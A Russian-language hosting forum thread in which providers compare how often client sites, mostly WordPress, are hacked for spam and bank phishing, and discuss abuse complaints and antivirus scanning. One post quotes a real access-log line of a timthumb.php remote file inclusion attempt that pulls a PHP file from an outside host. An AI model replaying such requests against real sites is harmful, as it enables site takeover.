- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Народ, интересно мнение. Точнее критика: прав я или нет.
На протяжении примерно последнего года я заметил следующую особенность. Среди многих поводов общения с клиентами, есть три неприятных:
1) Взломали сайт. Восстановите мне из бэкапа
2) Пришла жалоба на фишинг
3) Пришла жалоба на спам
Казалось бы со всеми бывает. Если бы не одно странное совпадение: все 100% - WordPress.
Я не помню, чтобы клиенту взломали Joomla, DLE или MODx. Почему-то всегда WordPress. Вообще без исключений.
Спам. все без исключений случаи: wp-includes/class-phpmailer.php
Фишинг - опять же все до единого случаи с WordPress. Только там не вообще сайт, а какая-нибудь незаметная страничка посвящена банку.
У всех ли такая статистика или я ошибаюсь?
У нас например 70% WP и 30% DLE
У моих клиентов почему-то DLE не пользуется популярностью, поэтому мало что про него знаю.
Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.
У меня уже начали появляться мысли запрета WordPress на хостинге. Чтобы не приходили даже - тогда и прогонять не придется.
Подтверждаю. Чаще всего WP ломают. Наша статистика 80% wp - 10% joomla и 10% DLE. Естественно всё приблизительно. А ломают потому что обновлять не умеют (не хотят) или пароли в фтп менеджере хранят. Но это вы и без меня знаете.
WP/Joomla примерно одинаково ломают.
В этом месяце вообще есть тренд на подбор пароля к админке CMS, и заливку шелла через нее.
Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.
Чекаем антивирусом и уведомляем клиентов до того как придет абуза.
У моих клиентов почему-то DLE не пользуется популярностью, поэтому мало что про него знаю.
Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.
У меня уже начали появляться мысли запрета WordPress на хостинге. Чтобы не приходили даже - тогда и прогонять не придется.
а смысл гнать, вот недавно аналогично всплывал банковский фейк заныканный в wp, как раз таки они виноваты в том что не обновляют свои файлы, приходится помогать пинком в нужном направлении..
можно конечно и погнать если не предпринимают мер, за банковские фейки и сервер могут конфисковать запросто.
последний раз ломали через timthumb.php
112.215.36.175 - - [05/Nov/2012:07:32:57 +0400] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.slmseguros.es/content/png.php HTTP/1.1" 400 214 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
я тут подумываю антивирус запустить в linux что бы хотя бы сигнализировал и удалял шеллы или написать скрипт который будет находить файлы в которых шифрованный код.
Антивирус не могу себе позволить - сервер упадет. Там миллионы файлов.
А пиннать сотни людей - это ж мне придется жить только этим вопросом.
Антивирус не могу себе позволить - сервер упадет. Там миллионы файлов.
А пиннать сотни людей - это ж мне придется жить только этим вопросом.
ну вот по этой причине АВ пока не рискую поставить.
разве так часто ломают сайты? у нас конечно не 10к клиентов но 1.5к сайтов на наших серверах есть, я бы не сказал что абузят часто по факту взлома.
Все по тихоньку. В зависимости как клиент своевременно отновляет свои скрипты. Мы например постоянно пишем людям и напоминаем о серьезных обновленях в популярных движках. А куда деваться - лучший способ защиты от всякой вредной ерунды - это профилактика.
ну вот по этой причине АВ пока не рискую поставить.
разве так часто ломают сайты? у нас конечно не 10к клиентов но 1.5к сайтов на наших серверах есть, я бы не сказал что абузят часто по факту взлома.
Вот за сегодня три жалобы. Два сайта прикинулись банками, один разослал 700 писем спама (это еще ладно хоть ограничения на отсылку есть, а то бы вообще устроил переполох).
А жалобы не простые: от Hetzner. Сами понимаете, что будет, если задолбать хецнеровцев проблемами.
В общем-то я на абузы трачу существенное количество времени. Основная их проблема - их разрешение не автоматизируется никак. Мне бы конечно хотелось заняться более важными проблемами, чем трата по часу на споры с каждым абузным клиентом.
Подтверждаю. Чаще всего WP ломают. Наша статистика 80% wp - 10% joomla и 10% DLE.
Возможно, просто хостите 80% WP, 10% Джумлу и 10% ДЛЕ. Тогда к статистике это отношения не имеет.
А ломают потому что обновлять не умеют (не хотят) или пароли в фтп менеджере хранят.
А виноват в этом движок, да?
Ерунда. ВП менее дыряв, чем Джумла с ДЛЕ. Просто следить за обновлениями нужно и не наставлять плагинов неизвестных. Ну и общее - выставлять права на файлы, нормальные пароли с солью. Меня вон пытались ломать, ддосили, потом засыпали флудом так, что память ВПСки засирало за пару часов. И ничего, отстояла ВПшка. Не в движке дело, а в прокладке между стулом и клавиатурой.
Во какие картинки нашел: